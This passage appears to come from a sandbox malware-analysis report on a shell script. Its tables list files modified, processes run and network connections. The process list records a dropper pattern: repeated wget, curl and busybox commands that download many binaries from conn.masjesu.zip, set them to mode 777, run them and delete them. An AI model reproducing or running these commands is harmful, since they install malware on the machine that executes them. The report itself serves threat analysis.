| File opened for modification | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /usr/bin/curl | N/A |
Processes
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/chmod
[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/rm
[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/chmod
[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK
[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/rm
[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/chmod
[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB
[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/rm
[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/chmod
[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I
[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/rm
[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/chmod
[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O
[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/rm
[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/chmod
[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ
[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/rm
[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/chmod
[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S
[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/rm
[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/chmod
[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv
[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/rm
[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/chmod
[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp
[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/rm
[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/chmod
[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4
[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/rm
[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/chmod
[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7
[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/rm
[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/chmod
[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw
[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/rm
[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/chmod
[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn
[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/rm
[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/chmod
[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A
[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/rm
[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/chmod
[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/bin/rm
[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/chmod
[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK
[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/bin/rm
[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/chmod
[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB
[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/bin/rm
[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/chmod
[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I
[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/bin/rm
[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/chmod
[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O
[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/rm
[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/chmod
[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ
[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/rm
[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/chmod
[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S
[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/rm
[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/chmod
[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A
[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/rm
[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/chmod
[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv
[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/rm
[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/chmod
[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp
[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/rm
[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/chmod
[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4
[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/rm
[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/chmod
[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7
[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/rm
[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/chmod
[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw
[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/rm
[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/chmod
[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn
[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/rm
[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
